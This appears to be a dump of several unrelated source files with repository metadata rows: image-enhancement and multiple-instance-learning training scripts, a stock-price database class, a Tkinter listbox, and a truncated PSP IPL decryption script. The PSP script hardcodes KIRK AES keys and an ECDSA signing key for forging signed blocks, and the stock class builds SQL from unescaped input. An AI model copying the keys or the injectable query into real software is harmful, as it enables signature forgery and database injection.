# batch_input_high = np.zeros((batch_size, patch_size, patch_size, 3), dtype="float32") #
eval_imgs = read_directory('/home/intern2/jay/project/pt_kind/dataset/eval15/low')
eval_img = load_images(cv2.imread('/home/intern2/jay/project/pt_kind/dataset/eval15/low/1.png'))
## decom model
model_decom = DecomNet()
model_decom = nn.DataParallel(model_decom).cuda()
model_decom.load_state_dict(checkpoint)
model_decom.eval()
## run decom_model ------------- why use RR2 preprocess
for i, data in enumerate(train_loader):
print('i :', i)
train_low, train_high = data
train_low = train_low.permute([0, 3, 1, 2]).cuda()
train_high = train_high.permute([0, 3, 1, 2]).cuda()
R_low, I_low = model_decom(train_low)
R_high, I_high = model_decom(train_high)
R_high = torch.pow(R_high, 1.2)
# R_low = torch.squeeze(R_low)
# I_low = torch.squeeze(I_low)
I_low = I_low.permute([0, 2, 3, 1]).squeeze(0).cpu().detach().numpy()
R_low = R_low.permute([0, 2, 3, 1]).squeeze(0).cpu().detach().numpy()
R_high = R_high.permute([0, 2, 3, 1]).squeeze(0).cpu().detach().numpy()
# R_low = np.squeeze(R_low)
# I_low = np.squeeze(I_low)
decomposed_low_i_data_480.append(I_low) # I_low
decomposed_low_r_data_480.append(R_low)
#print('R_i_shape', I_low.shape)
decomposed_high_r_data_480.append(R_high)
# print('decomposed_low_i_data_480 shape ',decomposed_low_i_data_480.shape)
decomposed_low_i_data_480 = np.array(decomposed_low_i_data_480)
decomposed_low_r_data_480 = np.array(decomposed_low_r_data_480)
decomposed_high_r_data_480 = np.array(decomposed_high_r_data_480)
# print('decomposed_low_i_data_480 shape ',decomposed_low_i_data_480.shape)
# print('shape ',decomposed_low_i_data_480.shape)
adjDataset = adjustdataset(decomposed_low_i_data_480, decomposed_low_r_data_480, decomposed_high_r_data_480)
train_loader = DataLoader(dataset=adjDataset,
batch_size=adj_batch_size,
shuffle=True) # ,num_workers=16
reloss = restore_loss().cuda()
start = time.time()
for epo in range(epoch):
model_restore.train() #
print('epoch :', epo)
initial_lr = learning_rate
if epo<=800:
lr = initial_lr
elif epo<=1250:
lr = initial_lr/2
elif epo<=1500:
lr = initial_lr/4
else:
lr = initial_lr/10
optimizer.param_groups[0]['lr'] = lr
for i, data in enumerate(train_loader):
# for i, in range(485):
# train_loader
# data = torch.Tensor(data)
train_r, train_i, train_hr = data
#print('shape :',train_r.shape)
train_r = train_r.permute([0, 3, 1, 2])#.cuda()
train_i = train_i.permute([0, 3, 1, 2])#.cuda()
train_hr = train_hr.permute([0, 3, 1, 2])#.cuda()
j = train_r.shape[0]
m = j // batch_size
if (m * 10 < j):
m = m + 1
for index in range(m):
#print('index ', index)
if ((index + 1) * batch_size > train_r.shape[0]):
t = (index + 1) * batch_size - j
else:
t = batch_size
#print('train _ r shape :',train_r[index * batch_size:index * batch_size + t, :, :, :].shape)
#print('train _ i shape :',train_i[index * batch_size:index * batch_size + t, :, :, :].shape)
R_low_r = model_restore(train_r[index * batch_size:index * batch_size + t, :, :, :],
train_i[index * batch_size:index * batch_size + t, :, :, :])
#model_restore(train_r[index * batch_size:index * batch_size + t, :, :, :],
# train_i[index * batch_size:index * batch_size + t, :, :, :])
print('R_low shape :',R_low_r.shape)
#print('train_hr shape :', train_hr[index * 10:index * 10 + t, :, :, :].shape)
loss = reloss(R_low_r,train_hr[index * batch_size:index * batch_size + t, :, :, :])
optimizer.zero_grad()
loss.backward()
optimizer.step()
print('loss :',loss)
# R_low_i = model_restore( train_i[index * 10:index * 10 + t, :, :, :])
# R_high_r = model_restore( train_hr[index * 10:index * 10 + t, :, :, :])
# print('train pos ',train_low[index * 10:index * 10 +t,:,:,:].device)
# print('w:',index * 10)
# loss = dloss(train_low[index * 10:index * 10 + t, :, :, :],
# train_high[index * 10:index * 10 + t, :, :, :], R_low, I_low, R_high, I_high).cuda()
# # print('2 ---------- ')
# optimizer.zero_grad()
# loss.backward()
# optimizer.step()
# print('loss :', loss)
#
if ((epo + 1) % everyepoch == 0):
img = np.array(eval_img)
img = torch.FloatTensor(img) # .unsqueeze(0)
#print('shape 1',img.shape)
img = img.unsqueeze(0)
# print('shape 2',img[0].shape)
# img = img.unsqueeze(0)
# print('shape 3',img[(epo+1)//200].shape)
img = img.permute([0, 3, 1, 2]).cuda()
print('shape 2',img.shape)
dr,di = model_decom(img)
print('dr ',dr.shape)
print('di ',di.shape)
R_high = model_restore(train_r[index * batch_size:index * batch_size + t, :, :, :],train_i[index * batch_size:index * batch_size + t, :, :, :])
print('r_high ',R_high.shape)
#I_high = torch.cat([I_high, I_high, I_high], axis=1)
R_high = R_high.permute([0, 2, 3, 1])
dr = dr.permute([0, 2, 3, 1])
#I_high = I_high.permute([0, 2, 3, 1])
print('dr shape',dr.shape)
print('R_high',R_high.shape)
save_images(os.path.join(sample_dir, 'low_%d.png' % (epo)), dr,R_high)
end = time.time()
print('time :',end -start)
torch.save({'state_dict': model_restore.state_dict(), 'epoch': epoch}, 'MyNet_retore' + str(epoch) + '_best.pkl')
print('Save best statistics done!')
| [
"958086580@qq.com"
] | 958086580@qq.com |
3675c81fa64f643435af8af8959c0960e81f4429 | a5592f706bf25484843eaa466f86ea3214a46ea2 | /practice.py | 9db1a194f636bfcc1afc0452c6be57614f92fc4c | [] | no_license | BOBKINGS1101/Practice | e54f6043bb110f2db962a80849a2a8c2ac5e24f9 | 86ced13a119bd612b5b3250bc6604b1031b860a7 | refs/heads/master | 2020-08-08T13:11:21.887998 | 2019-10-09T06:47:35 | 2019-10-09T06:47:35 | 213,838,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,528 | py | import re
import torch as t
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.checkpoint as cp
from collections import OrderedDict
import numpy as np
class ClassName(object):
"""docstring for ClassName"""
def __init__(self, arg):
super(ClassName, self).__init__()
self.arg = arg
class _DenseLayer(nn.Sequential):
def __init__(self, num_input_features, growth_rate, bn_size, drop_rate, memory_efficient=False):
super(_DenseLayer, self).__init__()
self.add_module('norm1', nn.BatchNorm2d(num_input_features)),
self.add_module('relu1', nn.ReLU(inplace=True)),
self.add_module('conv1', nn.Conv2d(num_input_features, bn_size *
growth_rate, kernel_size=1, stride=1,
bias=False)),
self.add_module('norm2', nn.BatchNorm2d(bn_size * growth_rate)),
self.add_module('relu2', nn.ReLU(inplace=True)),
self.add_module('conv2', nn.Conv2d(bn_size * growth_rate, growth_rate,
kernel_size=3, stride=1, padding=1,
bias=False)),
self.drop_rate = drop_rate
self.memory_efficient = memory_efficient
def forward(self, *prev_features):
bn_function = _bn_function_factory(self.norm1, self.relu1, self.conv1)
if self.memory_efficient and any(prev_feature.requires_grad for prev_feature in prev_features):
bottleneck_output = cp.checkpoint(bn_function, *prev_features)
else:
bottleneck_output = bn_function(*prev_features)
new_features = self.conv2(self.relu2(self.norm2(bottleneck_output)))
if self.drop_rate > 0:
new_features = F.dropout(new_features, p=self.drop_rate,
training=self.training)
return new_features
class _DenseBlock(nn.Module):
def __init__(self, num_layers, num_input_features, bn_size, growth_rate, drop_rate, memory_efficient=False):
super(_DenseBlock, self).__init__()
for i in range(num_layers):
layer = _DenseLayer(
num_input_features + i * growth_rate,
growth_rate=growth_rate,
bn_size=bn_size,
drop_rate=drop_rate,
memory_efficient=memory_efficient,
)
self.add_module('denselayer%d' % (i + 1), layer)
def forward(self, init_features):
features = [init_features]
for name, layer in self.named_children():
new_features = layer(*features)
features.append(new_features)
return torch.cat(features, 1)
#model=_DenseBlock(3,5,5,2,0.5)
#for name,module in model.named_children():
# print(module)
#x=np.array([[[1,1,1],[2,2,2]]])
#print(x.shape[0])
#print(x.shape)
#print(x[:,0])
#print(x[:,1])
#a=t.Tensor([[1,2,3,4,5,6,7,8],[1,2,3,4,5,6,7,8]])
#b=a.reshape(-1)
#print(a)
#print(b)
#size=np.array([1,2,3])
#aspect_ratios=np.array([1,0.5,2])
#for s,a in zip(size,aspect_ratios):
# print('s:{0:.3f}'.format(s))
# print('a:{0:.3f}'.format(a))
anchors_over_all_feature_maps=np.array([[0,3,3,4,4],[1,1,1,2,2,],[2,5,5,6,6],[3,7,7,8,8]])
anchors=[]
for i in range(0,1):#imagelist
anchor_in_image=[]
for anchors_per_feature_map in anchors_over_all_feature_maps:
anchor_in_image.append(anchors_per_feature_map)
anchors.append(anchor_in_image)
print(anchors)
anchors=[(anchors_per_feature_map) for anchors_per_image in anchors]
print(anchors) | [
"844311505@qq.com"
] | 844311505@qq.com |
9e51c268e2e7071f710e2cada3da0c3dd7aadc10 | b3967ca7c0590014a8b7659f6d505e61d22e8322 | /5.시세DB구축 및 시세 조회API 개발/Analyzer.py | 3014c257949017d306ac53b866fd1141382ddef9 | [] | no_license | est22/FDA | abfa7a8891a5d603eed2762cc947056d9a8ea08d | 6fa69fa8052a57725cf33ec07d17f7251db7393f | refs/heads/main | 2023-02-26T13:26:55.415634 | 2021-01-31T17:51:06 | 2021-01-31T17:51:06 | 328,329,950 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,746 | py | import pandas as pd
import pymysql
from datetime import datetime
from datetime import timedelta
import re
class MarketDB:
def __init__(self):
"""생성자: MariaDB 연결 및 종목코드 딕셔너리 생성"""
self.conn = pymysql.connect(host='localhost', user='root',
password='', db='Stock', charset='utf8')
self.codes = {}
self.get_comp_info()
def __del__(self):
"""소멸자: MariaDB 연결 해제"""
self.conn.close()
def get_comp_info(self):
"""company_info 테이블에서 읽어와서 codes에 저장"""
sql = "SELECT * FROM company_info"
krx = pd.read_sql(sql, self.conn)
for idx in range(len(krx)):
self.codes[krx['code'].values[idx]] = krx['company'].values[idx]
def get_daily_price(self, code, start_date=None, end_date=None):
"""KRX 종목의 일별 시세를 데이터프레임 형태로 반환
- code : KRX 종목코드('005930') 또는 상장기업명('삼성전자')
- start_date : 조회 시작일('2020-01-01'), 미입력 시 1년 전 오늘
- end_date : 조회 종료일('2020-12-31'), 미입력 시 오늘 날짜
"""
if start_date is None:
one_year_ago = datetime.today() - timedelta(days=365)
start_date = one_year_ago.strftime('%Y-%m-%d')
print("start_date is initialized to '{}'".format(start_date))
else:
start_lst = re.split('\D+', start_date)
if start_lst[0] == '':
start_lst = start_lst[1:]
start_year = int(start_lst[0])
start_month = int(start_lst[1])
start_day = int(start_lst[2])
if start_year < 1900 or start_year > 2200:
print(f"ValueError: start_year({start_year:d}) is wrong.")
return
if start_month < 1 or start_month > 12:
print(f"ValueError: start_month({start_month:d}) is wrong.")
return
if start_day < 1 or start_day > 31:
print(f"ValueError: start_day({start_day:d}) is wrong.")
return
start_date=f"{start_year:04d}-{start_month:02d}-{start_day:02d}"
if end_date is None:
end_date = datetime.today().strftime('%Y-%m-%d')
print("end_date is initialized to '{}'".format(end_date))
else:
end_lst = re.split('\D+', end_date)
if end_lst[0] == '':
end_lst = end_lst[1:]
end_year = int(end_lst[0])
end_month = int(end_lst[1])
end_day = int(end_lst[2])
if end_year < 1800 or end_year > 2200:
print(f"ValueError: end_year({end_year:d}) is wrong.")
return
if end_month < 1 or end_month > 12:
print(f"ValueError: end_month({end_month:d}) is wrong.")
return
if end_day < 1 or end_day > 31:
print(f"ValueError: end_day({end_day:d}) is wrong.")
return
end_date = f"{end_year:04d}-{end_month:02d}-{end_day:02d}"
codes_keys = list(self.codes.keys())
codes_values = list(self.codes.values())
if code in codes_keys:
pass
elif code in codes_values:
idx = codes_values.index(code)
code = codes_keys[idx]
else:
print(f"ValueError: Code({code}) doesn't exist.")
sql = f"SELECT * FROM daily_price WHERE code = '{code}'"\
f" and date >= '{start_date}' and date <= '{end_date}'"
df = pd.read_sql(sql, self.conn)
df.index = df['date']
return df
| [
"noreply@github.com"
] | est22.noreply@github.com |
4345f43ceebfae6bf9b4514241a243202d936d70 | 6d71de4e88dcb7d04f6d3a18736d393e12f8d087 | /scripts/packages/mylistbox.py | 27d62cd97b87fe9edbbcf35263ca9292f8eac3c9 | [
"MIT"
] | permissive | wyolum/Alex | 71075c30691229e8eb28afa06a6ab44c450b14d4 | 03f1d8ae0107454d18964e33777ffc4c0c1a1951 | refs/heads/main | 2023-07-02T16:11:57.088323 | 2021-08-05T17:59:04 | 2021-08-05T17:59:04 | 338,686,528 | 10 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,551 | py | #https://tk-tutorial.readthedocs.io/en/latest/listbox/listbox.html
import tkinter as tk
def listbox(parent, items, item_clicked, item_selected, n_row=40):
def myclick(event=None):
idx = lb.curselection()
if idx:
out = lb.get(idx)
search.delete(0, tk.END)
search.insert(0, out)
item_clicked(out)
def myselect(event):
myclick(event)
idx = lb.curselection()
out = lb.get(idx)
item_selected(out)
def search_changed(*args):
search_str = search_var.get()
i = 0
lb.delete(0, tk.END)
for item in items:
if search_str.lower() in item.lower():
lb.insert(i, item)
i += 1
frame = tk.Frame(parent)
search_var = tk.StringVar()
#search_var.trace('w', search_changed)
search = tk.Entry(frame, width=40, textvariable=search_var)
search.grid(row=1, column=0)
var = tk.StringVar(value=items)
lb = tk.Listbox(frame, listvariable=var, selectmode='single', height=n_row, width=40)
lb.grid(row=2, column=0)
lb.bind('<<ListboxSelect>>', myclick)
lb.bind('<Double-Button-1>', myselect)
frame.get = lb.get
frame.insert = lb.insert
frame.delete = lb.delete
frame.index = lb.index
return frame
def click(*args):
print('click', args)
def select(*args):
print('select', args)
if __name__ == '__main__':
root = tk.Tk()
frame = listbox(root, dir(tk), click, select)
frame.grid()
root.mainloop()
| [
"wyojustin@gmail.com"
] | wyojustin@gmail.com |
ce65e1e932a3e2ddcb25657bc25a563aa6027622 | 5225e78b02c661d1ff7fdd873ded60eda394811f | /generator/__init__.py | e447551f789a8f641820315294498da5b3e2cad4 | [] | no_license | sn0wf1llin/tcap | 1d3676b8e225c68c9b96c14c0c3801b0ff7dc835 | 93af911f3e0652961a25b2b992f943f6acf59b2a | refs/heads/master | 2021-01-24T10:30:06.260318 | 2016-12-02T10:18:23 | 2016-12-02T10:18:23 | 69,731,085 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 74 | py | __author__ = 'MA573RWARR10R'
import digits_voc_
import traindata_generator | [
"MA573RWARR10R@h3llca7.local"
] | MA573RWARR10R@h3llca7.local |
dc0957d43234dbfb017b836dc15558c38e372156 | 27ad60a591ccedeb7babd16e5ef11dc9d555cc52 | /MI_Net.py | 01b172e2ca553fb32b4b29561ba5ea1b27dbe1f5 | [] | no_license | kilakila-heart/MINNs | 6cfc305c726d05f8068b103f4f2d6772811e512a | 9e1ad121fc0f2396a4f8edcc2f6e12f9ec08f466 | refs/heads/master | 2021-06-24T00:08:34.558901 | 2017-09-07T06:51:09 | 2017-09-07T06:51:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,106 | py | import numpy as np
import sys
import time
import random
from random import shuffle
import argparse
from keras.models import Model
from keras.optimizers import SGD
from keras.regularizers import l2
from keras.layers import Input, Dense, Layer, Dropout
from mil_nets.dataset import load_dataset
from mil_nets.layer import Feature_pooling
from mil_nets.metrics import bag_accuracy
from mil_nets.objectives import bag_loss
from mil_nets.utils import convertToBatch
def parse_args():
"""Parse input arguments.
Parameters
-------------------
No parameters.
Returns
-------------------
args: argparser.Namespace class object
An argparse.Namespace class object contains experimental hyper-parameters.
"""
parser = argparse.ArgumentParser(description='Train a MI-Net')
parser.add_argument('--dataset', dest='dataset',
help='dataset to train on, like musk1 or fox',
default=None, type=str)
parser.add_argument('--pooling', dest='pooling_mode',
help='mode of MIL pooling',
default='max', type=str)
parser.add_argument('--lr', dest='init_lr',
help='initial learning rate',
default=5e-4, type=float)
parser.add_argument('--decay', dest='weight_decay',
help='weight decay',
default=0.005, type=float)
parser.add_argument('--momentum', dest='momentum',
help='momentum',
default=0.9, type=float)
parser.add_argument('--epoch', dest='max_epoch',
help='number of epoch to train',
default=50, type=int)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def test_eval(model, test_set):
"""Evaluate on testing set.
Parameters
-----------------
model : keras.engine.training.Model object
The training MI-Net model.
test_set : list
A list of testing set contains all training bags features and labels.
Returns
-----------------
test_loss : float
Mean loss of evaluating on testing set.
test_acc : float
Mean accuracy of evaluating on testing set.
"""
num_test_batch = len(test_set)
test_loss = np.zeros((num_test_batch, 1), dtype=float)
test_acc = np.zeros((num_test_batch, 1), dtype=float)
for ibatch, batch in enumerate(test_set):
result = model.test_on_batch({'input':batch[0]}, {'fp':batch[1]})
test_loss[ibatch] = result[0]
test_acc[ibatch][0] = result[1]
return np.mean(test_loss), np.mean(test_acc)
def train_eval(model, train_set):
"""Evaluate on training set.
Parameters
-----------------
model : keras.engine.training.Model object
The training MI-Net model.
train_set : list
A list of training set contains all training bags features and labels.
Returns
-----------------
test_loss : float
Mean loss of evaluating on traing set.
test_acc : float
Mean accuracy of evaluating on testing set.
"""
num_train_batch = len(train_set)
train_loss = np.zeros((num_train_batch, 1), dtype=float)
train_acc = np.zeros((num_train_batch, 1), dtype=float)
shuffle(train_set)
for ibatch, batch in enumerate(train_set):
result = model.train_on_batch({'input':batch[0]}, {'fp':batch[1]})
train_loss[ibatch] = result[0]
train_acc[ibatch][0] = result[1]
return np.mean(train_loss), np.mean(train_acc)
def MI_Net(dataset):
"""Train and evaluate on MI-Net.
Parameters
-----------------
dataset : dict
A dictionary contains all dataset information. We split train/test by keys.
Returns
-----------------
test_acc : float
Testing accuracy of MI-Net.
"""
# load data and convert type
train_bags = dataset['train']
test_bags = dataset['test']
# convert bag to batch
train_set = convertToBatch(train_bags)
test_set = convertToBatch(test_bags)
dimension = train_set[0][0].shape[1]
# data: instance feature, n*d, n = number of training instance
data_input = Input(shape=(dimension,), dtype='float32', name='input')
# fully-connected
fc1 = Dense(256, activation='relu', W_regularizer=l2(args.weight_decay))(data_input)
fc2 = Dense(128, activation='relu', W_regularizer=l2(args.weight_decay))(fc1)
fc3 = Dense(64, activation='relu', W_regularizer=l2(args.weight_decay))(fc2)
# dropout
dropout = Dropout(p=0.5)(fc3)
# features pooling
fp = Feature_pooling(output_dim=1, W_regularizer=l2(args.weight_decay), pooling_mode=args.pooling_mode, name='fp')(dropout)
model = Model(input=[data_input], output=[fp])
sgd = SGD(lr=args.init_lr, decay=1e-4, momentum=args.momentum, nesterov=True)
model.compile(loss=bag_loss, optimizer=sgd, metrics=[bag_accuracy])
# train model
t1 = time.time()
num_batch = len(train_set)
for epoch in range(args.max_epoch):
train_loss, train_acc = train_eval(model, train_set)
test_loss, test_acc = test_eval(model, test_set)
print 'epoch=', epoch, ' train_loss= {:.3f}'.format(train_loss), ' train_acc= {:.3f}'.format(train_acc), ' test_loss={:.3f}'.format(test_loss), ' test_acc= {:.3f}'.format(test_acc)
t2 = time.time()
print 'run time:', (t2-t1) / 60, 'min'
print 'test_acc={:.3f}'.format(test_acc)
return test_acc
if __name__ == '__main__':
args = parse_args()
print 'Called with args:'
print args
# perform five times 10-fold cross-validation experiments
run = 5
n_folds = 10
acc = np.zeros((run, n_folds), dtype=float)
for irun in range(run):
dataset = load_dataset(args.dataset, n_folds)
for ifold in range(n_folds):
print 'run=', irun, ' fold=', ifold
acc[irun][ifold] = MI_Net(dataset[irun])
print 'MI-Net mean accuracy = ', np.mean(acc)
print 'std = ', np.std(acc)
| [
"624993525@qq.com"
] | 624993525@qq.com |
aaf496d7464998178eef745a50663c6a58a5db80 | d9125031f498665a621fd71f0078c0400f782a6b | /decrypt_ipl.py | 42be36a33f3388d33342feea690c006ef3a47558 | [
"MIT"
] | permissive | DaveeFTW/iplsdk | 8076c28249ce733cae00c3920191ee7dbd87bec4 | f07668e4d16965930d5a06c1b8f1664c6bcd2fbf | refs/heads/main | 2023-09-01T15:04:09.205335 | 2023-08-23T22:59:14 | 2023-08-23T22:59:14 | 167,315,667 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 12,603 | py | #!/bin/env python3
import sys
import struct
from Crypto.Cipher import AES
from Crypto.Hash import CMAC, SHA1
from Crypto import Random
from ecdsa.ellipticcurve import CurveFp, Point
from ecdsa.curves import Curve
from ecdsa import SigningKey
_k4_k7_keys = [
'2C92E5902B86C106B72EEA6CD4EC7248',
'058DC80B33A5BF9D5698FAE0D3715E1F',
'B813C35EC64441E3DC3C16F5B45E6484',
'9802C4E6EC9E9E2FFC634CE42FBB4668',
'99244CD258F51BCBB0619CA73830075F',
'0225D7BA63ECB94A9D237601B3F6AC17',
'6099F28170560E5F747CB520C0CDC23C',
'76368B438F77D87EFE5FB6115939885C',
'14A115EB434A1BA4905E03B617A15C04',
'E65803D9A71AA87F059D229DAF5453D0',
'BA3480B428A7CA5F216412F70FBB7323',
'72AD35AC9AC3130A778CB19D88550B0C',
'8485C848750843BC9B9AECA79C7F6018',
'B5B16EDE23A97B0EA17CDBA2DCDEC46E',
'C871FDB3BCC5D2F2E2D7729DDF826882',
'0ABB336C96D4CDD8CB5F4BE0BADB9E03',
'32295BD5EAF7A34216C88E48FF50D371',
'46F25E8E4D2AA540730BC46E47EE6F0A',
'5DC71139D01938BC027FDDDCB0837D9D',
'51DD65F071A4E5EA6AAF12194129B8F4',
'03763C6865C69B0FFE8FD8EEA43616A0',
'7D50B85CAF6769F0E54AA8098B0EBE1C',
'72684B32AC3B332F2A7AFC9E14D56F6B',
'201D31964AD99FBF32D5D61C491BD9FC',
'F8D84463D610D12A448E9690A6BB0BAD',
'5CD4057FA13060440AD9B6745F244F4E',
'F48AD678599C22C1D411933DF845B893',
'CAE7D287A2ECC1CD94542B5E1D9488B2',
'DE26D37A39956C2AD8C3A6AF21EBB301',
'7CB68B4DA38D1DD932679CA99FFB2852',
'A0B556B469AB368F36DEC9092ECB41B1',
'939DE19B725FEEE2452ABC1706D14769',
'A4A4E621382EF1AF7B177AE842AD0031',
'C37F13E8CF84DB34747BC3A0F19D3A73',
'2BF7838AD898E95FA5F901DA61FE35BB',
'C704621E714A66EA62E04B203DB8C2E5',
'C933859AAB00CDCE4D8B8E9F3DE6C00F',
'1842561F2B5F34E3513EB78977431A65',
'DCB0A0065A50A14E59AC973F1758A3A3',
'C4DBAE83E29CF254A3DD374E807BF425',
'BFAEEB498265C57C64B8C17E19064409',
'797CECC3B3EE0AC03BD8E6C1E0A8B1A4',
'7534FE0BD6D0C28D68D4E02AE7D5D155',
'FAB35326974F4EDFE4C3A814C32F0F88',
'EC97B386B433C6BF4E539D95EBB979E4',
'B320A204CF480629B5DD8EFC98D4177B',
'5DFC0D4F2C39DA684A3374ED4958A73A',
'D75A5422CED9A3D62B557D8DE8BEC7EC',
'6B4AEE4345AE7007CF8DCF4E4AE93CFA',
'2B522F664C2D114CFE61318C56784EA6',
'3AA34E44C66FAF7BFAE55327EFCFCC24',
'2B5C78BFC38E499D41C33C5C7B2796CE',
'F37EEAD2C0C8231DA99BFA495DB7081B',
'708D4E6FD1F66F1D1E1FCB02F9B39926',
'0F6716E180699C51FCC7AD6E4FB846C9',
'560A494A844C8ED982EE0B6DC57D208D',
'12468D7E1C42209BBA5426835EB03303',
'C43BB6D653EE67493EA95FBC0CED6F8A',
'2CC3CF8C2878A5A663E2AF2D715E86BA',
'833DA70CED6A2012D196E6FE5C4D37C5',
'C743D06742EE90B8CA75503520ADBCCE',
'8AE3663F8D9E82A1EDE68C9CE8256DAA',
'7FC96F0BB1485CA55DD364B77AF5E4EA',
'91B765788BCB8BD402ED553A6662D0AD',
'2824F9101B8D0F7B6EB263B5B55B2EBB',
'30E2575DE0A249CEE8CF2B5E4D9F52C7',
'5EE50439623202FA85393F72BB77FD1A',
'F88174B1BDE9BFDD45E2F55589CF46AB',
'7DF49265E3FAD678D6FE78ADBB3DFB63',
'747FD62DC7A1CA96E27ACEFFAA723FF7',
'1E58EBD065BBF168C5BDF746BA7BE100',
'24347DAF5E4B35727A52276BA05474DB',
'09B1C705C35F536677C0EB3677DF8307',
'CCBE615C05A20033378E5964A7DD703D',
'0D4750BBFCB0028130E184DEA8D48413',
'0CFD679AF9B4724FD78DD6E99642288B',
'7AD31A8B4BEFC2C2B39901A9FE76B987',
'BE787817C7F16F1AE0EF3BDE4CC2D786',
'7CD8B891910A4314D0533DD84C45BE16',
'32722C8807CF357D4A2F511944AE68DA',
'7E6BBFF6F687B898EEB51B3216E46E5D',
'08EA5A8349B59DB53E0779B19A59A354',
'F31281BFE69F51D164082521FFBB2261',
'AFFE8EB13DD17ED80A61241C959256B6',
'92CDB4C25BF2355A2309E819C9144235',
'E1C65B226BE1DA02BA18FA21349EF96D',
'14EC76CE97F38A0A34506C539A5C9AB4',
'1C9BC490E3066481FA59FDB600BB2870',
'43A5CACC0D6C2D3F2BD989676B3F7F57',
'00EFFD1808A405893C38FB2572706106',
'EEAF49E009879BEFAAD6326A3213C429',
'8D26B90F431DBB08DB1DDAC5B52C92ED',
'577C3060AE6EBEAE3AAB1819C571680B',
'115A5D20D53A8DD39CC5AF410F0F186F',
'0D4D51AB2379BF803ABFB90E75FC14BF',
'9993DA3E7D2E5B15F252A4E66BB85A98',
'F42830A5FB0D8D760EA671C22BDE669D',
'FB5FEB7FC7DCDD693701979B29035C47',
'02326AE7D396CE7F1C419DD65207ED09',
'9C9B1372F8C640CF1C62F5D592DDB582',
'03B302E85FF381B13B8DAA2A90FF5E61',
'BCD7F9D32FACF847C0FB4D2F309ABDA6',
'F55596E97FAF867FACB33AE69C8B6F93',
'EE297093F94E445944171F8E86E170FC',
'E434520CF088CFC8CD781B6CCF8C48C4',
'C1BF66818EF953F2E1266B6F550CC9CD',
'560FFF8F3C9649144516F1BCBFCEA30C',
'2408DC753760A29F0554B5F243857399',
'DDD5B56A59C55AE83B9667C75C2AE2DC',
'AA686772E02D44D5CDBB6504BCD5BF4E',
'1F17F014E777A2FE4B136B56CD7EF7E9',
'C93548CF558D7503896B2EEB618CA902',
'DE34C541E7CA86E8BEA7C31CECE4360F',
'DDE5FF551B74F6F4E016D7AB22311B6A',
'B0E93521333FD7BAB4762CCB4D8008D8',
'381469C4C3F91B9633638E4D5F3DF029',
'FA486AD98E6716EF6AB087F589457F2A',
'321A091250148A3E963DEA025932E18F',
'4B00BE29BCB02864CEFD43A96FD95CED',
'577DC4FF0244E28091F4CA0A7569FDA8',
'835336C61803E43E4EB30F6B6E799B7A',
'5C9265FD7B596AA37A2F509D85E927F8',
'9A39FB89DF55B2601424CEA6D9650A9D',
'8B75BE91A8C75AD2D7A594A01CBB9591',
'95C21B8D05ACF5EC5AEE77812395C4D7',
'B9A461643633FA5D9488E2D3281E01A2',
'B8B084FB9F4CFAF730FE7325A2AB897D',
'5F8C179FC1B21DF1F6367A9CF7D3D47C'
]
def kirk4(data, key):
aes = AES.new(bytes.fromhex(_k4_k7_keys[key]), AES.MODE_CBC, iv=b'\x00'*16)
return aes.encrypt(data)
def kirk7(data, key):
aes = AES.new(bytes.fromhex(_k4_k7_keys[key]), AES.MODE_CBC, iv=b'\x00'*16)
return aes.decrypt(data)
class Kirk1(object):
def __init__(self):
self.key = bytes.fromhex('98C940975C1D10E87FE60EA3FD03A8BA')
self.iv = bytes.fromhex('00000000000000000000000000000000')
p = 0xFFFFFFFFFFFFFFFF00000001FFFFFFFFFFFFFFFF
a = -3
b = 0x65D1488C0359E234ADC95BD3908014BD91A525F9
Gx = 0x2259ACEE15489CB096A882F0AE1CF9FD8EE5F8FA
Gy = 0x604358456D0A1CB2908DE90F27D75C82BEC108C0
r = 0xffffffffffffffff0001b5c617f290eae1dbad8f
curve = CurveFp(p, a, b)
generator = Point(curve, Gx, Gy, r)
self.curve = Curve("KIRK", curve, generator, (1, 3, 3, 7, 4))
self.sk = SigningKey.from_string(bytes.fromhex('F392E26490B80FD889F2D9722C1F34D7274F983D'), curve=self.curve)
self.vk = self.sk.get_verifying_key()
self.k1_enc = AES.new(self.key, AES.MODE_CBC, self.iv)
self.k1_dec = AES.new(self.key, AES.MODE_CBC, self.iv)
def decrypt(self, block):
mode = struct.unpack("<I", block[0x60:0x64])[0]
ecdsa = struct.unpack("<I", block[0x64:0x68])[0]
size = struct.unpack("<I", block[0x70:0x74])[0]
offset = struct.unpack("<I", block[0x74:0x78])[0]
padding = 0
while (size + offset + padding) % 16 != 0:
padding = padding + 1
size = size + padding
# decrypt our kirk keys
keys = self.k1_dec.decrypt(block[0x00:0x20])
if ecdsa == 1:
self.__verify_ecdsa(block, size, offset)
else:
self.__verify_cmac(keys[0x10:0x20], block, size, offset)
aes = AES.new(keys[0x00:0x10], AES.MODE_CBC, self.iv)
return aes.decrypt(block[0x90+offset:0x90+offset+size])
def encrypt(self, data, salt=b'', key=None, ecdsa=False, cmac_key=None):
if key == None:
key = Random.get_random_bytes(0x10);
return self.__encrypt_ecdsa(data, key, salt) if ecdsa else self.__encrypt_cmac(data, key, cmac_key, salt)
def __encrypt_ecdsa(self, data, key, salt):
aes = AES.new(key, AES.MODE_CBC, self.iv)
# generate header and sign
kirk_header2 = struct.pack('<II8xII8x16x', 1, 1, len(data), len(salt))
header_signature = self.sk.sign(kirk_header2)
# generate second part of block and sign
block = kirk_header2 + salt + aes.encrypt(data)
data_signature = self.sk.sign(block)
# encrypt the aes key and package signatures
block = self.k1_enc.encrypt(key) + header_signature + data_signature + block
# verify our signatures are valid
self.__verify_ecdsa(block, len(data), len(salt))
return block
def __encrypt_cmac(self, data, key, cmac_key, salt):
aes = AES.new(key, AES.MODE_CBC, self.iv)
cmac_key = cmac_key if cmac_key != None else Random.get_random_bytes(0x10)
cmac = CMAC.new(cmac_key, ciphermod=AES)
# generate header and mac
kirk_header2 = struct.pack('<II8xII8x16x', 1, 0, len(data), len(salt))
cmac.update(kirk_header2)
header_mac = cmac.digest()
# generate second part of block and mac
block = kirk_header2 + salt + aes.encrypt(data)
cmac = CMAC.new(cmac_key, ciphermod=AES)
cmac.update(block)
